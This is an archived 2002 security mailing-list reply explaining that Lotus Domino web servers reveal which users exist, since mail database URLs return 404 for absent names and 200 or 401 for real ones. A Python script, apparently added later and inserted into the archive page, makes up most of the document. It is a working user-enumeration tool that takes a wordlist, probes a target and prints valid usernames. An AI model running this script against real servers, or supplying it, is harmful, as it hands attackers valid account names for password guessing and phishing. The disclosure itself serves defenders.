Re: Script for find domino's users

From: David Litchfield (davidat_private)
Date: Mon Feb 04 2002 - 08:28:31 PST

    >
    > >Two things can be done to avoid this:
    > >
    > >1 - Change the ACL on sensitive databases (/mail/*, names.nsf) to:
    > >      Anonymous - No access
    > >      [Default] - No access
    >
    > In my opinion, a Domino webserver configured with these ACLs still allows
    > enumeration of valid users.
    >
    > If you try to GET a file named /mail/toto.nsf:
    > - toto doesn't exist => 404
    > - toto exists => redirection to the login page ("200 OK")
    >
    > I'm not aware of any ACL configuration which forbids this behaviour.
    
    If you've configured the Domino server to use form-based logins/cookies
    you'll get a 200 response. Otherwise you'll get a 401 Unauthorized.
    Either way you can still determine if the .nsf or .box file exists.
    Cheers,
    David Litchfield
    http://www.ngssoftware.com/
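
A worked version of the probe the thread describes, added here as an illustration; it is not code from the original message, from NGSSoftware, or from any Domino tooling. It requests /mail/<name>.nsf for each candidate short name without following redirects and reads 404 as "absent" and 200 or 401 as "exists", which is exactly the distinction discussed above. Treating a 302 to the login page as "exists", the /mail/<shortname>.nsf layout, the random-name sanity probe and the host name are assumptions of the example, not facts from the thread.

```python
"""Probe a Domino web server for the 404-vs-200/401 user-enumeration oracle.

Added illustration; not code from the original thread.  Assumptions are
marked inline.
"""
import secrets
import sys
import urllib.error
import urllib.request
from urllib.parse import quote

# From the thread: an existing database behind a "No access" ACL answers
# 200 (form-based login page) or 401 (basic-auth challenge); a missing one
# answers 404.  Assumption: some form-login setups redirect (302) to the
# login page instead of serving it inline, so 302 is treated as "exists" too.
EXISTS_CODES = {200, 302, 401}
ABSENT_CODES = {404}


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Refuse to follow redirects so a 302 surfaces as its own status code."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def fetch_status(base_url, path, timeout=10):
    """GET base_url+path and return the raw HTTP status without following redirects."""
    opener = urllib.request.build_opener(_NoRedirect)
    req = urllib.request.Request(base_url.rstrip("/") + path, method="GET")
    try:
        with opener.open(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        # urllib raises for unfollowed 3xx, 4xx and 5xx; the code is what we want.
        return err.code


def mail_db_path(name):
    """Path of a user's mail file; /mail/<shortname>.nsf is the conventional layout (assumption)."""
    return "/mail/" + quote(name, safe="") + ".nsf"


def classify(status):
    """Translate a status code into the oracle's verdict for the probed database."""
    if status in ABSENT_CODES:
        return "absent"
    if status in EXISTS_CODES:
        return "exists"
    return "unknown"


def oracle_works(base_url, fetch=fetch_status):
    """Sanity check before trusting results: a random, surely nonexistent name
    must come back 'absent'.  If it does not (e.g. a catch-all page answers 200
    for everything), the 404-vs-200/401 difference is not observable here."""
    probe = "zz" + secrets.token_hex(8)
    return classify(fetch(base_url, mail_db_path(probe))) == "absent"


def enumerate_users(base_url, candidates, fetch=fetch_status):
    """Return {candidate: verdict} for each short name in candidates."""
    return {name: classify(fetch(base_url, mail_db_path(name))) for name in candidates}


if __name__ == "__main__":
    # usage: python domino_enum.py http://domino.example names.txt
    target, wordlist = sys.argv[1], sys.argv[2]
    if not oracle_works(target):
        sys.exit("random name did not yield 404; oracle not usable on this server")
    with open(wordlist) as fh:
        names = [line.strip() for line in fh if line.strip()]
    for name, verdict in sorted(enumerate_users(target, names).items()):
        if verdict == "exists":
            print(name)
```

The fetch function is injectable so the classification logic can be exercised against a constructed responder without touching a real server; the oracle_works check is the caveat a tester would want before reading anything into the results, since a server that returns the same page for every path gives no signal.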
    This archive was generated by hypermail 2b30 : Mon Feb 04 2002 - 17:33:43 PST